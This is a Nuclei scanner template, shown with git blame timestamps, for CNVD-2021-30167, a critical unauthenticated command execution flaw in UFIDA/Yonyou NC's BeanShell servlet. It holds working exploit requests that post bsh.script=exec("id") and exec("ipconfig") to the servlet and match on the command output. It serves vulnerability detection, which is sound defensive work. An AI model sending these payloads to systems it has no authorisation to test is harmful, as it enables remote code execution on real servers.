nuclei-templates/http/cnvd/2021/CNVD-2021-30167.yaml

51 lines
1.3 KiB
YAML
Raw Normal View History

2021-06-03 17:17:18 +00:00
id: CNVD-2021-30167
2021-06-01 08:28:04 +00:00
info:
name: UFIDA NC BeanShell Remote Command Execution
2021-06-01 08:28:04 +00:00
author: pikpikcu
severity: critical
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
- https://chowdera.com/2022/03/202203110138271510.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2022-07-06 09:10:47 +00:00
tags: cnvd,cnvd2021,beanshell,rce,yonyou
metadata:
max-request: 2
2021-06-01 08:28:04 +00:00
http:
2021-06-01 08:28:04 +00:00
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 12:37:32 +00:00
2021-06-03 17:17:18 +00:00
bsh.script=exec("id");
2021-06-01 08:28:04 +00:00
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2021-06-02 12:37:32 +00:00
bsh.script=exec("ipconfig");
2021-06-01 08:28:04 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-06-03 17:17:18 +00:00
- "uid="
2021-06-01 08:28:04 +00:00
- "Windows IP"
2021-06-03 17:17:18 +00:00
condition: or
- type: word
words:
- "BeanShell Test Servlet"
2021-06-01 08:28:04 +00:00
- type: status
status:
- 200